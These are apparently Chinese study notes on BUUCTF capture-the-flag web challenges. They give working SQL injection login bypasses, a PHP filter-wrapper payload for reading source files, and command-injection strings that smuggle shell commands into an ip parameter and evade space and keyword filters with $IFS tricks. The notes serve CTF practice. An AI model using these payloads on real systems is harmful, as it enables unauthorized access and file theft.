BUUCTF

# [极客大挑战 2019]EasySQL

用户名：1' or 1=1 #
密 码： 1' or 1=1 #

# [极客大挑战 2019]Havefun

        $cat=$_GET['cat'];
        echo $cat;
        if($cat=='dog'){
            echo 'Syc{cat_cat_cat_cat}';  
# 用get的方式cat=dog

# [ACTF2020 新生赛]Include

php伪协议主要用来读取文件
?file=php://filter/convert.base64-encode/resource=flag.php
     └──┬─────────┘ └─────────┬────────┘ └─────┬──────┘
       协议头             过滤器               资源路径
为什么要有base64转码？
flag.php当成一个文件去执行而不是返回文件源码
如果没有转码，直接读取php文件（当作脚本执行）不返回源码 
使用convert.base64-encode的前提是，读取的文件是脚本，反之txt、config无需，但这样有点多余了（直接在url后拼接文件名）

# [ACTF2020 新生赛]Exec

target=127.0.0.1|cat+/f*
请求URL从服务器的文件系统中检索任意文件

# [GXYCTF2019]Ping Ping Ping

相对于上个命令执行添加的过滤条件
┌──(root㉿kali)-[~/桌面]
└─# ls | a=41154;cat $a.sh   #关键字绕过                                                                   
┌──(root㉿kali)-[~/桌面]
└─# echo $IFS$9              #空格绕过

GET /?ip=127.0.0.1|ls HTTP/1.1 /?ip=
	flag.php
	index.php
GET /?ip=127.0.0.1|cat$IFS$9index.php HTTP/1.1
	可以看到过滤规则，
/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
	flag
管道符右面是可以执行的命令，赋值不行，；允许变量赋值/?ip=127.0.0.1|a=g;cat$IFS$9fla$a.php
马勒戈壁的，最后的flag在前端里